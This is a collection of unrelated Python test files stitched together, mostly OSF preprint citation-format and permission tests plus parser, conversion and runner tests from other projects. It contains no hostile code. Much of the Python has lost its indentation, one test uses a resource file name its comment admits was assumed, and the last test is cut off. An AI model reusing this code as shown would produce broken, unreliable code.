res = self.app.get(self.unpublished_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 403)
# Write contrib
self.unpublished_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.unpublished_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
# Really because preprint is in initial machine state, not because of published flag
assert_equal(res.status_code, 403)
# Admin contrib
res = self.app.get(self.unpublished_preprint_url, auth=self.admin_contributor.auth)
assert_equal(res.status_code, 200)
def test_private_preprint_citations(self):
self.published_preprint.is_public = False
self.published_preprint.save()
# Unauthenticated
res = self.app.get(self.published_preprint_url, expect_errors=True)
assert_equal(res.status_code, 401)
# Non contrib
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 403)
# Write contrib
self.published_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
        # Contributors can view citations of a private preprint
assert_equal(res.status_code, 200)
# Admin contrib
res = self.app.get(self.published_preprint_url, auth=self.admin_contributor.auth)
assert_equal(res.status_code, 200)
def test_deleted_preprint_citations(self):
self.published_preprint.deleted = timezone.now()
self.published_preprint.save()
# Unauthenticated
res = self.app.get(self.published_preprint_url, expect_errors=True)
assert_equal(res.status_code, 404)
# Non contrib
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 404)
# Write contrib
self.published_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
        # 404 because the preprint is deleted
assert_equal(res.status_code, 404)
# Admin contrib
res = self.app.get(self.published_preprint_url, auth=self.admin_contributor.auth, expect_errors=True)
assert_equal(res.status_code, 404)
def test_abandoned_preprint_citations(self):
self.published_preprint.machine_state = DefaultStates.INITIAL.value
self.published_preprint.save()
# Unauthenticated
res = self.app.get(self.published_preprint_url, expect_errors=True)
assert_equal(res.status_code, 401)
# Non contrib
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 403)
# Write contrib
self.published_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
# Really because preprint is in initial machine state
assert_equal(res.status_code, 403)
# Admin contrib
res = self.app.get(self.published_preprint_url, auth=self.admin_contributor.auth)
assert_equal(res.status_code, 200)
class TestPreprintCitationContentMLA(ApiTestCase):
def setUp(self):
super(TestPreprintCitationContentMLA, self).setUp()
self.admin_contributor = AuthUserFactory()
self.published_preprint = PreprintFactory(
creator=self.admin_contributor)
self.published_preprint.title = 'My Preprint'
self.published_preprint.save()
self.admin_contributor.given_name = 'Grapes'
self.admin_contributor.middle_names = ' Coffee Beans '
self.admin_contributor.family_name = 'McGee'
self.admin_contributor.save()
self.published_preprint_url = '/{}preprints/{}/citation/modern-language-association/'.format(
API_BASE, self.published_preprint._id)
self.second_contrib = AuthUserFactory()
self.second_contrib.given_name = 'Darla'
self.second_contrib.middle_names = 'Texas Toast'
self.second_contrib.family_name = 'Jenkins'
self.second_contrib.suffix = 'Junior'
self.second_contrib.save()
self.third_contrib = AuthUserFactory()
self.third_contrib.given_name = 'Lilith'
self.third_contrib.middle_names = 'Radar'
self.third_contrib.family_name = 'Schematics'
self.third_contrib.save()
def test_not_published(self):
self.published_preprint.date_published = None
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, u'McGee, Grapes C. B. “{}.” {}, {} Web.'.format(
self.published_preprint.title,
self.published_preprint.provider.name,
'n.d.')
)
def test_one_author(self):
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
# test_suffix
self.admin_contributor.suffix = 'Junior'
self.admin_contributor.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
# test_no_middle_names
self.admin_contributor.suffix = ''
self.admin_contributor.middle_names = ''
self.admin_contributor.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
def test_citation_no_repeated_periods(self):
self.published_preprint.title = 'A Study of Coffee.'
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
def test_citation_osf_provider(self):
self.published_preprint.title = 'A Study of Coffee.'
self.published_preprint.save()
self.published_preprint.provider.name = 'Open Science Framework'
self.published_preprint.provider.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
def test_two_authors(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
def test_three_authors(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.add_contributor(self.third_contrib)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
# first name suffix
self.admin_contributor.suffix = 'Jr.'
self.admin_contributor.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
class TestPreprintCitationContentAPA(ApiTestCase):
def setUp(self):
super(TestPreprintCitationContentAPA, self).setUp()
self.admin_contributor = AuthUserFactory()
self.published_preprint = PreprintFactory(
title='A Study of Coffee',
creator=self.admin_contributor
)
self.published_preprint.save()
self.admin_contributor.given_name = 'Grapes'
self.admin_contributor.middle_names = ' Coffee Beans '
self.admin_contributor.family_name = 'McGee'
self.admin_contributor.save()
self.second_contrib = AuthUserFactory()
self.second_contrib.given_name = 'Darla'
self.second_contrib.middle_names = 'Texas Toast'
self.second_contrib.family_name = 'Jenkins'
self.second_contrib.suffix = 'Junior'
self.second_contrib.save()
self.third_contrib = AuthUserFactory()
self.third_contrib.given_name = 'Lilith'
self.third_contrib.middle_names = 'Radar'
self.third_contrib.family_name = 'Schematics'
self.third_contrib.save()
self.published_preprint_url = '/{}preprints/{}/citation/apa/'.format(
API_BASE, self.published_preprint._id)
def test_not_published(self):
self.published_preprint.date_published = None
self.published_preprint.save()
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation,
u'McGee, G. C. B., & Jenkins, D. T. T., Junior. ({}). {}. {}'.format(
'n.d.',
self.published_preprint.title,
'https://doi.org/' + self.published_preprint.article_doi
)
)
def test_one_author(self):
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_equal(citation,
u'McGee, G. C. B. ({}). {}. {}'.format(
date,
self.published_preprint.title,
'https://doi.org/' + self.published_preprint.article_doi
)
)
# test_suffix
self.admin_contributor.suffix = 'Junior'
self.admin_contributor.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_equal(citation,
u'McGee, G. C. B., Junior. ({}). {}. {}'.format(
date,
self.published_preprint.title,
'https://doi.org/' + self.published_preprint.article_doi
)
)
# test_no_middle_names
self.admin_contributor.suffix = ''
self.admin_contributor.middle_names = ''
self.admin_contributor.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_equal(citation,
u'McGee, G. ({}). {}. {}'.format(
date,
self.published_preprint.title,
'https://doi.org/' + self.published_preprint.article_doi
)
)
def test_two_authors(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_equal(citation,
u'McGee, G. C. B., & Jenkins, D. T. T., Junior. ({}). {}. {}'.format(
date,
self.published_preprint.title,
'https://doi.org/' + self.published_preprint.article_doi
)
)
def test_three_authors_and_title_with_period(self):
self.published_preprint.title = 'This Title Ends in a Period.'
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.add_contributor(self.third_contrib)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_equal(citation, u'McGee, G. C. B., Jenkins, D. T. T., Junior, & Schematics, L. R. ({}). {}. {}'.format(
date,
'This Title Ends in a Period',
'https://doi.org/' + self.published_preprint.article_doi)
)
def test_seven_authors(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.add_contributor(self.third_contrib)
for i in range(1, 5):
new_user = AuthUserFactory()
new_user.given_name = 'James'
new_user.family_name = 'Taylor{}'.format(i)
new_user.save()
self.published_preprint.add_contributor(new_user)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_equal(citation,
u'McGee, G. C. B., Jenkins, D. T. T., Junior, Schematics, L. R., Taylor1, J., Taylor2, J., Taylor3, J., & Taylor4, J. ({}). {}. {}'.format(
date,
self.published_preprint.title,
'https://doi.org/' + self.published_preprint.article_doi
)
)
def test_eight_authors(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.add_contributor(self.third_contrib)
for i in range(1, 6):
new_user = AuthUserFactory()
new_user.given_name = 'James'
new_user.family_name = 'Taylor{}'.format(i)
new_user.save()
self.published_preprint.add_contributor(new_user)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_equal(citation,
u'McGee, G. C. B., Jenkins, D. T. T., Junior, Schematics, L. R., Taylor1, J., Taylor2, J., Taylor3, J., … Taylor5, J. ({}). {}. {}'.format(
date,
self.published_preprint.title,
'https://doi.org/' + self.published_preprint.article_doi
)
)
class TestPreprintCitationContentChicago(ApiTestCase):
def setUp(self):
super(TestPreprintCitationContentChicago, self).setUp()
self.admin_contributor = AuthUserFactory()
self.published_preprint = PreprintFactory(
title='A Study of Coffee',
creator=self.admin_contributor)
self.published_preprint.save()
self.admin_contributor.given_name = 'Grapes'
self.admin_contributor.middle_names = ' Coffee Beans '
self.admin_contributor.family_name = 'McGee'
self.admin_contributor.save()
self.published_preprint_url = '/{}preprints/{}/citation/chicago-author-date/'.format(
API_BASE, self.published_preprint._id)
self.second_contrib = AuthUserFactory()
self.second_contrib.given_name = 'Darla'
self.second_contrib.middle_names = 'Texas Toast'
self.second_contrib.family_name = 'Jenkins'
self.second_contrib.suffix = 'Junior'
self.second_contrib.save()
self.third_contrib = AuthUserFactory()
self.third_contrib.given_name = 'Lilith'
self.third_contrib.middle_names = 'Radar'
self.third_contrib.family_name = 'Schematics'
self.third_contrib.save()
def test_not_published(self):
self.published_preprint.date_published = None
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation,
u'McGee, Grapes C. B. {} “{}.” {}. {}.'.format(
'n.d.',
self.published_preprint.title,
self.published_preprint.provider.name,
'doi:' + self.published_preprint.article_doi,
)
)
def test_one_author(self):
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published
assert_equal(citation,
u'McGee, Grapes C. B. {}. “{}.” {}. {}. {}.'.format(
date.strftime('%Y'),
self.published_preprint.title,
self.published_preprint.provider.name,
date.strftime('%B %-d'),
'doi:' + self.published_preprint.article_doi
)
)
# test_suffix
self.admin_contributor.suffix = 'Junior'
self.admin_contributor.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published
assert_equal(citation,
u'McGee, Grapes C. B., Junior. {}. “{}.” {}. {}. {}.'.format(
date.strftime('%Y'),
self.published_preprint.title,
self.published_preprint.provider.name,
date.strftime('%B %-d'),
'doi:' + self.published_preprint.article_doi
)
)
# test_no_middle_names
self.admin_contributor.suffix = ''
self.admin_contributor.middle_names = ''
self.admin_contributor.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published
assert_equal(citation,
u'McGee, Grapes. {}. “{}.” {}. {}. {}.'.format(
date.strftime('%Y'),
self.published_preprint.title,
self.published_preprint.provider.name,
date.strftime('%B %-d'),
'doi:' + self.published_preprint.article_doi
)
)
def test_two_authors(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published
assert_equal(citation,
u'McGee, Grapes C. B., and Darla T. T. Jenkins, Junior. {}. “{}.” {}. {}. {}.'.format(
date.strftime('%Y'),
self.published_preprint.title,
self.published_preprint.provider.name,
date.strftime('%B %-d'),
'doi:' + self.published_preprint.article_doi
)
)
def test_three_authors_and_title_with_period(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.add_contributor(self.third_contrib)
self.published_preprint.title = 'This Preprint ends in a Period.'
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published
assert_equal(citation, u'McGee, Grapes C. B., Darla T. T. Jenkins, Junior, and Lilith R. Schematics. {}. “{}.” {}. {}. {}.'.format(
date.strftime('%Y'),
'This Preprint Ends in a Period',
self.published_preprint.provider.name,
date.strftime('%B %-d'),
'doi:' + self.published_preprint.article_doi)
)
def test_eleven_contributors(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.add_contributor(self.third_contrib)
for i in range(1, 9):
new_user = AuthUserFactory()
new_user.given_name = 'James'
new_user.family_name = 'Taylor{}'.format(i)
new_user.save()
self.published_preprint.add_contributor(new_user)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published
assert_equal(citation,
u'McGee, Grapes C. B., Darla T. T. Jenkins, Junior, Lilith R. Schematics, James Taylor1, James Taylor2, James Taylor3, James Taylor4, et al. {}. “{}.” {}. {}. {}.'.format(
date.strftime('%Y'),
self.published_preprint.title,
self.published_preprint.provider.name,
date.strftime('%B %-d'),
'doi:' + self.published_preprint.article_doi
)
)
|
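# A small, self-contained sketch of the APA author-list truncation rule the
# tests above exercise: up to seven authors are all listed (with '&' before
# the last); with eight or more, only the first six are listed, followed by
# an ellipsis and the final author. This models the CSL rendering behaviour,
# not the OSF code itself.
def apa_author_list(names):
    if len(names) <= 7:
        if len(names) == 1:
            return names[0]
        return u'%s, & %s' % (u', '.join(names[:-1]), names[-1])
    # eight or more: first six, ellipsis, last
    return u'%s, \u2026 %s' % (u', '.join(names[:6]), names[-1])

assert apa_author_list(['A', 'B']) == u'A, & B'
assert apa_author_list(['A%d' % i for i in range(8)]) == \
    u'A0, A1, A2, A3, A4, A5, \u2026 A7'
|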
import getopt
args = '-a -b -cfoo -d bar a1 a2'.split()
optlist, args = getopt.getopt(args, 'abc:d:')
assert optlist == [('-a', ''), ('-b', ''), ('-c', 'foo'), ('-d', 'bar')]
|
"""Mininet tests for clib client library functionality.
* must be run as root
* you can run a specific test case only, by adding the class name of the test
case to the command. Eg ./clib_mininet_test.py FaucetUntaggedIPv4RouteTest
It is strongly recommended to run these tests via Docker, to ensure you have
all dependencies correctly installed. See ../docs/.
"""
from clib_mininet_test_main import test_main
import clib_mininet_tests
if __name__ == '__main__':
test_main([clib_mininet_tests.__name__])
|
"""Tests for tensor2tensor.data_generators.wikisum.utils."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensor2tensor.data_generators.wikisum import utils
import tensorflow as tf
pkg_dir, _ = os.path.split(__file__)
_TESTDATA = os.path.join(pkg_dir, "test_data")
def _get_testdata(filename):
with tf.gfile.Open(os.path.join(_TESTDATA, filename)) as f:
return f.read()
class UtilsTest(tf.test.TestCase):
def test_filter_paragraph(self):
for bad in tf.gfile.Glob(os.path.join(_TESTDATA, "para_bad*.txt")):
for p in _get_testdata(bad).split("\n"):
self.assertTrue(utils.filter_paragraph(p),
msg="Didn't filter %s" % p)
for good in tf.gfile.Glob(os.path.join(_TESTDATA, "para_good*.txt")):
for p in _get_testdata(good).split("\n"):
self.assertFalse(utils.filter_paragraph(p), msg="Filtered %s" % p)
if __name__ == "__main__":
tf.test.main()
|
"""
@package mi.dataset.parser.test
@file mi/dataset/parser/test/test_ctdmo_ghqr_imodem.py
@author Mark Worden
@brief Test code for a ctdmo_ghqr_imodem data parser
"""
import os
from nose.plugins.attrib import attr
from mi.core.exceptions import ConfigurationException, UnexpectedDataException
from mi.core.log import get_logger
from mi.dataset.dataset_parser import DataSetDriverConfigKeys
from mi.dataset.driver.ctdmo_ghqr.imodem.resource import RESOURCE_PATH
from mi.dataset.parser.ctdmo_ghqr_imodem import CtdmoGhqrImodemParser, \
CtdmoGhqrImodemParticleClassKey, \
CtdmoGhqrImodemMetadataTelemeteredDataParticle, \
CtdmoGhqrImodemMetadataRecoveredDataParticle, \
CtdmoGhqrImodemInstrumentTelemeteredDataParticle, \
CtdmoGhqrImodemInstrumentRecoveredDataParticle
from mi.dataset.test.test_parser import ParserUnitTestCase
log = get_logger()
@attr('UNIT', group='mi')
class CtdmoGhqrImodemParserUnitTestCase(ParserUnitTestCase):
"""
    ctdmo_ghqr_imodem parser unit test suite
"""
def setUp(self):
ParserUnitTestCase.setUp(self)
self._telemetered_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE:
'mi.dataset.parser.ctdmo_ghqr_imodem',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
CtdmoGhqrImodemParticleClassKey.METADATA_PARTICLE_CLASS:
CtdmoGhqrImodemMetadataTelemeteredDataParticle,
CtdmoGhqrImodemParticleClassKey.INSTRUMENT_PARTICLE_CLASS:
CtdmoGhqrImodemInstrumentTelemeteredDataParticle,
}
}
self._recovered_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE:
'mi.dataset.parser.ctdmo_ghqr_imodem',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
CtdmoGhqrImodemParticleClassKey.METADATA_PARTICLE_CLASS:
CtdmoGhqrImodemMetadataRecoveredDataParticle,
CtdmoGhqrImodemParticleClassKey.INSTRUMENT_PARTICLE_CLASS:
CtdmoGhqrImodemInstrumentRecoveredDataParticle,
}
}
def test_happy_path(self):
"""
Read files and verify that all expected particles can be read.
Verify that the contents of the particles are correct.
There should be no exceptions generated.
"""
log.debug('===== START TEST HAPPY PATH =====')
with open(os.path.join(RESOURCE_PATH, 'ctdmo01_20140712_120719.DAT'), 'r') as file_handle:
parser = CtdmoGhqrImodemParser(self._telemetered_config, file_handle, self.exception_callback)
particles = parser.get_records(1000)
self.assertEqual(self.exception_callback_value, [])
            # Uncomment to regenerate the expected-results file; asserting
            # against a freshly written .yml would make the test self-fulfilling.
            # self.particle_to_yml(particles, 'ctdmo01_20140712_120719_telem.yml')
self.assert_particles(particles, "ctdmo01_20140712_120719_telem.yml", RESOURCE_PATH)
with open(os.path.join(RESOURCE_PATH, 'ctdmo01_20140712_120719.DAT'), 'r') as file_handle:
parser = CtdmoGhqrImodemParser(self._recovered_config, file_handle, self.exception_callback)
particles = parser.get_records(1000)
self.assertEqual(self.exception_callback_value, [])
            # Uncomment to regenerate the expected-results file.
            # self.particle_to_yml(particles, 'ctdmo01_20140712_120719_recov.yml')
self.assert_particles(particles, "ctdmo01_20140712_120719_recov.yml", RESOURCE_PATH)
self.assertEqual(self.exception_callback_value, [])
log.debug('===== END TEST HAPPY PATH =====')
def test_bad_config(self):
"""
The test ensures that a ConfigurationException is raised when providing the
parser invalid configuration
"""
log.debug('===== START TEST BAD CONFIG =====')
with self.assertRaises(ConfigurationException):
with open(os.path.join(RESOURCE_PATH, 'ctdmo01_20140712_120719.DAT'), 'r') as file_handle:
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.ctdmo_ghqr_imodem',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: None
}
CtdmoGhqrImodemParser(config, file_handle, self.exception_callback)
log.debug('===== END TEST BAD CONFIG =====')
def test_unexpected_data(self):
"""
This test verifies that an unexpected data exception is reported when unexpected data
is found.
"""
log.debug('===== START TEST UNEXPECTED DATA =====')
with open(os.path.join(RESOURCE_PATH, 'unexpected_data.DAT'), 'r') as file_handle:
parser = CtdmoGhqrImodemParser(self._telemetered_config, file_handle, self.exception_callback)
parser.get_records(1)
self.assertEqual(len(self.exception_callback_value), 2)
for exception in self.exception_callback_value:
self.assertIsInstance(exception, UnexpectedDataException)
log.debug('===== END TEST UNEXPECTED DATA =====')
def test_no_particles(self):
"""
Verify that no particles are produced if the input file
has no instrument records.
"""
        log.debug('===== START TEST NO PARTICLES =====')
        # The resource file name below is assumed from the naming convention
        # used elsewhere in this suite.
        with open(os.path.join(RESOURCE_PATH, 'ctdmo01_20140712_120719_norecs.DAT'), 'r') as file_handle:
            parser = CtdmoGhqrImodemParser(self._recovered_config, file_handle, self.exception_callback)
            particles = parser.get_records(2)
            self.assertEqual(len(particles), 0)
            self.assertEqual(self.exception_callback_value, [])
        log.debug('===== END TEST NO PARTICLES =====')
def particle_to_yml(self, particles, filename, mode='w'):
"""
This is added as a testing helper, not actually as part of the parser tests. Since the same particles
will be used for the driver test it is helpful to write them to .yml in the same form they need in the
results.yml fids here.
"""
        # opened in write or append mode; to start from scratch, manually delete the file
fid = open(os.path.join(RESOURCE_PATH, filename), mode)
fid.write('header:\n')
fid.write(" particle_object: 'MULTIPLE'\n")
fid.write(" particle_type: 'MULTIPLE'\n")
fid.write('data:\n')
for i in range(0, len(particles)):
particle_dict = particles[i].generate_dict()
fid.write(' - _index: %d\n' % (i+1))
fid.write(' particle_object: %s\n' % particles[i].__class__.__name__)
fid.write(' particle_type: %s\n' % particle_dict.get('stream_name'))
fid.write(' internal_timestamp: %f\n' % particle_dict.get('internal_timestamp'))
for val in particle_dict.get('values'):
if isinstance(val.get('value'), float):
fid.write(' %s: %16.5f\n' % (val.get('value_id'), val.get('value')))
elif isinstance(val.get('value'), str):
fid.write(" %s: '%s'\n" % (val.get('value_id'), val.get('value')))
elif val.get('value') is None:
fid.write(" %s: !!null\n" % (val.get('value_id')))
else:
fid.write(' %s: %s\n' % (val.get('value_id'), val.get('value')))
fid.close()
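    # Illustrative shape of the .yml written by particle_to_yml above; the
    # particle type and field names shown are hypothetical:
    #
    # header:
    #   particle_object: 'MULTIPLE'
    #   particle_type: 'MULTIPLE'
    # data:
    #   - _index: 1
    #     particle_object: CtdmoGhqrImodemMetadataTelemeteredDataParticle
    #     particle_type: ctdmo_ghqr_imodem_metadata
    #     internal_timestamp: 3612953239.00000
    #     date_time_string: '20140712 12:07:19'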
|
from translate.convert import dtd2po
from translate.convert import test_convert
from translate.misc import wStringIO
from translate.storage import po
from translate.storage import dtd
class TestDTD2PO:
def dtd2po(self, dtdsource, dtdtemplate=None):
"""helper that converts dtd source to po source without requiring files"""
inputfile = wStringIO.StringIO(dtdsource)
inputdtd = dtd.dtdfile(inputfile)
convertor = dtd2po.dtd2po()
if dtdtemplate is None:
outputpo = convertor.convertstore(inputdtd)
else:
templatefile = wStringIO.StringIO(dtdtemplate)
templatedtd = dtd.dtdfile(templatefile)
outputpo = convertor.mergestore(templatedtd, inputdtd)
return outputpo
def convertdtd(self, dtdsource):
"""call the convertdtd, return the outputfile"""
inputfile = wStringIO.StringIO(dtdsource)
outputfile = wStringIO.StringIO()
templatefile = None
assert dtd2po.convertdtd(inputfile, outputfile, templatefile)
return outputfile.getvalue()
def singleelement(self, pofile):
"""checks that the pofile contains a single non-header element, and returns it"""
assert len(pofile.units) == 2
assert pofile.units[0].isheader()
print pofile.units[1]
return pofile.units[1]
def countelements(self, pofile):
"""returns the number of non-header items"""
if pofile.units[0].isheader():
return len(pofile.units) - 1
else:
return len(pofile.units)
def test_simpleentity(self):
"""checks that a simple dtd entity definition converts properly to a po entry"""
dtdsource = '<!ENTITY test.me "bananas for sale">\n'
pofile = self.dtd2po(dtdsource)
pounit = self.singleelement(pofile)
assert pounit.source == "bananas for sale"
assert pounit.target == ""
# Now with a template language
dtdtemplate = '<!ENTITY test.me "bananas for sale">\n'
dtdtranslated = '<!ENTITY test.me "piesangs te koop">\n'
pofile = self.dtd2po(dtdtranslated, dtdtemplate)
pounit = self.singleelement(pofile)
assert pounit.source == "bananas for sale"
assert pounit.target == "piesangs te koop"
def test_convertdtd(self):
"""checks that the convertdtd function is working"""
dtdsource = '<!ENTITY saveas.label "Save As...">\n'
posource = self.convertdtd(dtdsource)
pofile = po.pofile(wStringIO.StringIO(posource))
unit = self.singleelement(pofile)
assert unit.source == "Save As..."
assert unit.target == ""
def test_apos(self):
"""apostrophe should not break a single-quoted entity definition, bug 69"""
dtdsource = "<!ENTITY test.me 'bananas ' for sale'>\n"
pofile = self.dtd2po(dtdsource)
pounit = self.singleelement(pofile)
assert pounit.source == "bananas ' for sale"
def test_quotes(self):
"""quotes should be handled in a single-quoted entity definition"""
dtdsource = """<!ENTITY test.metoo '"Bananas" for sale'>\n"""
pofile = self.dtd2po(dtdsource)
pounit = self.singleelement(pofile)
print str(pounit)
assert pounit.source == '"Bananas" for sale'
def test_emptyentity(self):
"""checks that empty entity definitions survive into po file, bug 15"""
dtdsource = '<!ENTITY credit.translation "">\n'
pofile = self.dtd2po(dtdsource)
pounit = self.singleelement(pofile)
assert "credit.translation" in str(pounit)
assert 'msgctxt "credit.translation"' in str(pounit)
def test_emptyentity_translated(self):
"""checks that if we translate an empty entity it makes it into the PO, bug 101"""
dtdtemplate = '<!ENTITY credit.translation "">\n'
dtdsource = '<!ENTITY credit.translation "Translators Names">\n'
pofile = self.dtd2po(dtdsource, dtdtemplate)
unit = self.singleelement(pofile)
print unit
assert "credit.translation" in str(unit)
# We don't want this to simply be seen as a header:
assert len(unit.getid()) != 0
assert unit.target == "Translators Names"
def test_localisaton_note_simple(self):
"""test the simple localisation more becomes a #. comment"""
dtdsource = '''<!-- LOCALIZATION NOTE (alwaysCheckDefault.height):
There's some sort of bug which makes wrapping checkboxes not properly reflow,
causing the bottom border of the groupbox to be cut off; set this
appropriately if your localization causes this checkbox to wrap.
-->
<!ENTITY alwaysCheckDefault.height "3em">
'''
pofile = self.dtd2po(dtdsource)
posource = str(pofile)
print posource
assert posource.count('#.') == 5 # 1 Header extracted from, 3 comment lines, 1 autoinserted comment
def test_localisation_note_merge(self):
"""test that LOCALIZATION NOTES are added properly as #. comments and disambiguated with msgctxt entries"""
dtdtemplate = '<!--LOCALIZATION NOTE (%s): Some note -->\n' + \
'<!ENTITY %s "Source text">\n'
dtdsource = dtdtemplate % ("note1.label", "note1.label") + dtdtemplate % ("note2.label", "note2.label")
pofile = self.dtd2po(dtdsource)
posource = str(pofile.units[1]) + str(pofile.units[2])
print posource
assert posource.count('#.') == 2
assert posource.count('msgctxt') == 2
def test_donttranslate_simple(self):
"""check that we handle DONT_TRANSLATE messages properly"""
dtdsource = '''<!-- LOCALIZATION NOTE (region.Altitude): DONT_TRANSLATE -->
<!ENTITY region.Altitude "Very High">'''
pofile = self.dtd2po(dtdsource)
assert self.countelements(pofile) == 0
dtdsource = '''<!-- LOCALIZATION NOTE (exampleOpenTag.label): DONT_TRANSLATE: they are text for HTML tagnames: "<i>" and "</i>" -->
<!ENTITY exampleOpenTag.label "<i>">'''
pofile = self.dtd2po(dtdsource)
assert self.countelements(pofile) == 0
dtdsource = '''<!-- LOCALIZATION NOTE (imapAdvanced.label): Do not translate "IMAP" -->
<!ENTITY imapAdvanced.label "Advanced IMAP Server Settings">'''
pofile = self.dtd2po(dtdsource)
assert self.countelements(pofile) == 1
def test_donttranslate_label(self):
"""test strangeness when label entity is marked DONT_TRANSLATE and accesskey is not, bug 30"""
dtdsource = '<!--LOCALIZATION NOTE (editorCheck.label): DONT_TRANSLATE -->\n' + \
'<!ENTITY editorCheck.label "Composer">\n<!ENTITY editorCheck.accesskey "c">\n'
pofile = self.dtd2po(dtdsource)
posource = str(pofile)
        # we need to decide what we're going to do here - see the comments in bug 30
        # this tests the current implementation: the DONT_TRANSLATE string is removed, but the other remains
assert 'editorCheck.label' not in posource
assert 'editorCheck.accesskey' in posource
def test_donttranslate_onlyentity(self):
"""if the entity is itself just another entity then it shouldn't appear in the output PO file"""
